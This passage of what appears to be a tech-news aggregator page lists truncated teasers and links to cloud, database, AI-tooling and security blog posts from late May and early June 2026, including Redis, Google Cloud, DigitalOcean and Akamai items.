            </svg>
          </button>
        </h3><p>Welcome back to “What’s new in two,” your quick hit of Redis releases you might’ve missed over the last month. If your backlog has been winning lately, no worries—we’ve got the recap. We’re covering t</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/whats-new-in-two-may-2026-edition/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-scylladb-customer-experience-spotlight-tyler-denton" class="group relative scroll-mt-24">
        <a href="#h3-scylladb-customer-experience-spotlight-tyler-denton" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 ScyllaDB Customer Experience Spotlight: Tyler Denton
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-scylladb-customer-experience-spotlight-tyler-denton"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Welcome to the first installment of a new blog series introducing some of the experts you’re likely to encounter when you work with ScyllaDB. Let&#39;s get to know Tyler Denton, a Solutions Architect on t</p>
<p><strong>📅 May 28, 2026</strong> • <strong>📰 ScyllaDB Blog</strong></p>
<p><a href="https://www.scylladb.com/2026/05/28/scylladb-customer-experience-spotlight-tyler-denton/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-how-conflict-free-replicated-data-types-power-active-active-database-replication" class="group relative scroll-mt-24">
        <a href="#h3-how-conflict-free-replicated-data-types-power-active-active-database-replication" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 How Conflict-free Replicated Data Types power active-active database replication
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-how-conflict-free-replicated-data-types-power-active-active-database-replication"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Your application runs in three regions. A customer in Tokyo buys the last unit of a product at the exact moment a customer in Frankfurt buys the same SKU. Both writes succeed locally. Both replicas de</p>
<p><strong>📅 May 27, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/how-crdts-power-active-active-database-replication/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-best-paas-for-multi-region-deployments-in-2026" class="group relative scroll-mt-24">
        <a href="#h3-the-best-paas-for-multi-region-deployments-in-2026" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Best PaaS for Multi-Region Deployments in 2026
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-best-paas-for-multi-region-deployments-in-2026"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Narrower than the general multi-region listicle. Specifically the PaaS-shaped products that handle deploys, scaling, routing, and database adjacency across regions, with the seven regions Railway runs</p>
<p><strong>📅 May 27, 2026</strong> • <strong>📰 Railway Blog</strong></p>
<p><a href="https://blog.railway.com/p/best-paas-multi-region-deployments-2026"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-beyond-rag-using-yugabytedb-as-the-foundation-for-reliable-ai-decisions" class="group relative scroll-mt-24">
        <a href="#h3-beyond-rag-using-yugabytedb-as-the-foundation-for-reliable-ai-decisions" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Beyond RAG: Using YugabyteDB as the Foundation for Reliable AI Decisions
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-beyond-rag-using-yugabytedb-as-the-foundation-for-reliable-ai-decisions"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>With YugabyteDB at the core, customer records, vector embeddings, policies, and audit logs live together in a single distributed data layer. There is one source of truth and one consistent answer. Thi</p>
<p><strong>📅 May 26, 2026</strong> • <strong>📰 Yugabyte Blog</strong></p>
<p><a href="https://www.yugabyte.com/blog/using-yugabytedb-for-reliable-ai-decisions/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-context-orchestration-what-it-is-how-it-works" class="group relative scroll-mt-24">
        <a href="#h3-context-orchestration-what-it-is-how-it-works" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Context orchestration: what it is & how it works
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-context-orchestration-what-it-is-how-it-works"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Your LLM application works fine in a demo. You ship it to production, and it starts hallucinating on stale data, looping through the same tool calls, and burning through tokens in retry cycles. The mo</p>
<p><strong>📅 May 26, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/context-orchestration/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-single-shot-reliable-consumers-with-xreadgroup-claim-in-redis-84" class="group relative scroll-mt-24">
        <a href="#h3-single-shot-reliable-consumers-with-xreadgroup-claim-in-redis-84" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Single-shot reliable consumers with XREADGROUP CLAIM in Redis 8.4
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-single-shot-reliable-consumers-with-xreadgroup-claim-in-redis-84"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>In Redis 8.4, we extended XREADGROUP with a new optional CLAIM parameter that lets a single command both consume new stream entries and reclaim idle pending ones. In this blog post, we&#39;ll cover: Why r</p>
<p><strong>📅 May 26, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/single-shot-reliable-consumers-with-xreadgroup-claim-in-redis-84/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-platforms" class="group relative scroll-mt-24">
        <a href="#h2-platforms" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🌐 Platforms
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-platforms"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-the-oracle-of-delphi-will-steal-your-credentials" class="group relative scroll-mt-24">
        <a href="#h3-the-oracle-of-delphi-will-steal-your-credentials" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Oracle of Delphi Will Steal Your Credentials
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-oracle-of-delphi-will-steal-your-credentials"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Our deception technology is able to reroute attackers into honeypots, where they believe that they found their real target. The attacks brute forced passwords for RDP credentials to connect to the vic</p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/the-oracle-of-delphi-steal-your-credentials"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger" class="group relative scroll-mt-24">
        <a href="#h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Nansh0u Campaign – Hackers Arsenal Grows Stronger
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>In the beginning of April, three attacks detected in the Guardicore Global Sensor Network (GGSN) caught our attention. All three had source IP addresses originating in South-Africa and hosted by Volum</p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/the-nansh0u-campaign-hackers-arsenal-grows-stronger"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-diy-platform-trap-thats-burning-out-engineering-teams" class="group relative scroll-mt-24">
        <a href="#h3-the-diy-platform-trap-thats-burning-out-engineering-teams" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The DIY platform trap that’s burning out engineering teams
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-diy-platform-trap-thats-burning-out-engineering-teams"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Platform engineers are some of the most resourceful people in IT. Give them a problem, and they’ll automate their way The post The DIY platform trap that’s burning out engineering teams appeared first</p>
<p><strong>📅 May 31, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/diy-platform-burnout-trap/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-ai-disruptors-how-the-next-generation-of-business-is-being-built" class="group relative scroll-mt-24">
        <a href="#h3-ai-disruptors-how-the-next-generation-of-business-is-being-built" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AI Disruptors: How the Next Generation of Business is Being Built
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-ai-disruptors-how-the-next-generation-of-business-is-being-built"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Getting your hands on a capable AI model is the easy part now. Every team can reach the same frontier models through an API, so a strong model is not what sets a product apart. What separates a workin</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 DigitalOcean Blog</strong></p>
<p><a href="https://www.digitalocean.com/blog/ai-disruptors"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-aws-end-user-messaging-rcs-for-business-now-available-in-20-additional-countries" class="group relative scroll-mt-24">
        <a href="#h3-aws-end-user-messaging-rcs-for-business-now-available-in-20-additional-countries" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AWS End User Messaging RCS for Business now available in 20 additional countries
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-aws-end-user-messaging-rcs-for-business-now-available-in-20-additional-countries"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>AWS End User Messaging now supports RCS for Business messaging in 20 additional countries, bringing the total to 22. Businesses can now send verified, branded RCS messages to customers in Austria, Bra</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/05/aws-rcs-countries/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-whats-new-with-google-cloud" class="group relative scroll-mt-24">
        <a href="#h3-whats-new-with-google-cloud" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What’s new with Google Cloud
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-whats-new-with-google-cloud"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Want to know the latest from Google Cloud? Find it here in one handy location. Check back regularly for our newest updates, announcements, resources, events, learning opportunities, and more. Tip: Not</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/topics/inside-google-cloud/whats-new-google-cloud/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-cool-stuff-google-cloud-customers-built-may-edition-agentic-algorithms-for-supply-chains-virtual-try-on-apis-robotic-camera-operators-more" class="group relative scroll-mt-24">
        <a href="#h3-cool-stuff-google-cloud-customers-built-may-edition-agentic-algorithms-for-supply-chains-virtual-try-on-apis-robotic-camera-operators-more" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Cool stuff Google Cloud customers built, May edition: Agentic algorithms for supply chains; virtual try-on APIs; robotic camera operators & more
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-cool-stuff-google-cloud-customers-built-may-edition-agentic-algorithms-for-supply-chains-virtual-try-on-apis-robotic-camera-operators-more"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>AI and cloud technology are reshaping every corner of every industry around the world. Without our customers, who are building the future on our platform, there would be no Google Cloud. In this regul</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/topics/customers/cool-stuff-google-cloud-customers-built-monthly-round-up/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-developers-guide-to-gemini-enterprise-and-a2ui-integration" class="group relative scroll-mt-24">
        <a href="#h3-developers-guide-to-gemini-enterprise-and-a2ui-integration" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Developer's guide to Gemini Enterprise and A2UI integration
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-developers-guide-to-gemini-enterprise-and-a2ui-integration"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>If you&#39;ve built a chatbot, you know this conversation: User: &quot;Book a table for two tomorrow at 7pm.&quot; Agent: &quot;Okay, for what day?&quot; User: &quot;Tomorrow.&quot; Agent: &quot;What time?&quot; A date picker would have ended t</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/topics/developers-practitioners/guide-to-gemini-enterprise-and-a2ui-integration/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-opencode-now-supports-digitalocean-inference-router-for-intelligent-model-routing" class="group relative scroll-mt-24">
        <a href="#h3-opencode-now-supports-digitalocean-inference-router-for-intelligent-model-routing" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 OpenCode Now Supports DigitalOcean Inference Router for Intelligent Model Routing
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-opencode-now-supports-digitalocean-inference-router-for-intelligent-model-routing"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Coding agents today have a massive spending problem. Every request, whether you’re designing system architecture or writing a single-line docstring, often gets routed to the same expensive frontier mo</p>
<p><strong>📅 May 28, 2026</strong> • <strong>📰 DigitalOcean Blog</strong></p>
<p><a href="https://www.digitalocean.com/blog/digitalocean-opencode-inference-routers"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-canonical-announces-optimized-ubuntu-images-for-tpu-virtual-machines-by-google-cloud" class="group relative scroll-mt-24">
        <a href="#h3-canonical-announces-optimized-ubuntu-images-for-tpu-virtual-machines-by-google-cloud" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Canonical announces optimized Ubuntu images for TPU virtual machines by Google Cloud
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-canonical-announces-optimized-ubuntu-images-for-tpu-virtual-machines-by-google-cloud"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Canonical and Google Cloud announced the availability of certified Ubuntu images for Google’s Cloud TPU Virtual Machines.</p>
<p><strong>📅 May 28, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/canonical-announces-optimized-ubuntu-images-for-tpu-virtual-machines-by-google-cloud"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-how-we-built-cloudflares-data-platform-and-an-ai-agent-on-top-of-it" class="group relative scroll-mt-24">
        <a href="#h3-how-we-built-cloudflares-data-platform-and-an-ai-agent-on-top-of-it" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 How we built Cloudflare's data platform and an AI agent on top of it
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-how-we-built-cloudflares-data-platform-and-an-ai-agent-on-top-of-it"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Here’s how we built Town Lake, Cloudflare&#39;s unified analytics platform, alongside Skipper, an internal AI agent running on top of it.</p>
<p><strong>📅 May 28, 2026</strong> • <strong>📰 Cloudflare Blog</strong></p>
<p><a href="https://blog.cloudflare.com/our-unified-data-platform/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-harness-launches-ai-roi-visibility-tools-for-enterprises" class="group relative scroll-mt-24">
        <a href="#h3-harness-launches-ai-roi-visibility-tools-for-enterprises" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Harness Launches AI ROI Visibility Tools for Enterprises
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-harness-launches-ai-roi-visibility-tools-for-enterprises"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Announcing AI DLC Insights and Cloud &amp; AI Cost Management: two new products that give engineering organizations real answers on what they are spending on AI, and whether that investment is worth it. |</p>
<p><strong>📅 May 28, 2026</strong> • <strong>📰 Harness Blog</strong></p>
<p><a href="https://www.harness.io/blog/harness-launches-products-give-visibility-into-roi-of-ai-spend"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-misc" class="group relative scroll-mt-24">
        <a href="#h2-misc" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📰 Misc
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-misc"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-visual-studio-code-1123" class="group relative scroll-mt-24">
        <a href="#h3-visual-studio-code-1123" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Visual Studio Code 1.123
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-visual-studio-code-1123"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
